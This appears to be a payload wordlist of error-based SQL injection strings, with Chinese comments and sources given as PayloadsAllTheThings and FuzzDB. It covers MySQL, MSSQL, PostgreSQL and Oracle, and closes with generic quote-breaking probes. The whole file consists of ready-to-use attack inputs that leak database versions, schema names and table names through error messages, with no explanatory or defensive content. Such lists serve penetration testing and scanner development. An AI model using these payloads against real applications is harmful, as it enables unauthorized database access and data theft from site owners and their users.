# Error-Based SQL Injection Payloads
# 来源: PayloadsAllTheThings, FuzzDB
# 大神级报错注入payload集合

# === MySQL Error-Based ===
# EXTRACTVALUE
AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 0,1)))--
AND EXTRACTVALUE(RAND(),CONCAT(CHAR(126),VERSION(),CHAR(126)))--
AND EXTRACTVALUE(RAND(),CONCAT(0X3A,(SELECT CONCAT(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT 0,1)))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
" AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
') AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
") AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--

# UPDATEXML
AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
AND UPDATEXML(1,CONCAT(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 0,1)),1)--
AND UPDATEXML(rand(),CONCAT(CHAR(126),version(),CHAR(126)),null)--
AND UPDATEXML(rand(),CONCAT(0x3a,(SELECT CONCAT(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT 0,1)),null)--
UPDATEXML(null,CONCAT(0x0a,version()),null)--
UPDATEXML(null,CONCAT(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)--
' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
" AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
') AND UPDATEXML(1,CONCAT(0x7e,version()),1)--
") AND UPDATEXML(1,CONCAT(0x7e,version()),1)--

# GTID_SUBSET (MySQL >= 5.6)
AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337)--
AND GTID_SUBSET(CONCAT('~',(SELECT table_name FROM information_schema.tables LIMIT 0,1),'~'),1337)--
' AND GTID_SUBSET(CONCAT('~',version(),'~'),1337)--
" AND GTID_SUBSET(CONCAT('~',version(),'~'),1337)--

# JSON_KEYS (MySQL >= 5.7)
AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8)))--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',version(),'~')) USING utf8)))--
" AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',version(),'~')) USING utf8)))--

# EXP (MySQL 5.5.5 - 5.5.49)
AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x))--
' AND EXP(~(SELECT * FROM (SELECT version())x))--
" AND EXP(~(SELECT * FROM (SELECT version())x))--

# FLOOR/RAND
OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0)--
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
(SELECT 1 AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))
'+(SELECT 1 AND ROW(1,1)>(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))+'

# NAME_CONST (MySQL >= 5.0, 仅常量)
AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
' AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
" AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--

# UUID_TO_BIN (MySQL >= 8.0)
AND UUID_TO_BIN(version())='1
' AND UUID_TO_BIN(version())='1
" AND UUID_TO_BIN(version())='1

# === MSSQL Error-Based ===
# CONVERT
AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~'))--
' AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~'))--
" AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~'))--
convert(int,@@version)
' + convert(int,@@version) + '

# CAST
CAST((SELECT @@version) AS INT)
' + cast((SELECT @@version) as int) + '
AND CAST((SELECT @@version) AS INT)=1--
' AND CAST((SELECT @@version) AS INT)=1--

# IN
AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~'))--
' AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~'))--
" AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~'))--

# EQUAL/CONCAT
AND 1337=CONCAT('~',(SELECT @@version),'~')--
' AND 1337=CONCAT('~',(SELECT @@version),'~')--
" AND 1337=CONCAT('~',(SELECT @@version),'~')--

# === PostgreSQL Error-Based ===
AND 1=CAST((SELECT version()) AS INT)--
' AND 1=CAST((SELECT version()) AS INT)--
" AND 1=CAST((SELECT version()) AS INT)--
AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) AS INT)--

# === Oracle Error-Based ===
AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--
' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE ROWNUM=1))--
AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1))--
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT banner FROM v$version WHERE ROWNUM=1))--

# === 通用检测 ===
'
"
`
')
")
`)
'))
"))
`))
;
'--
"--
`--
')--
")--
`)--
'))--
"))--
`))--
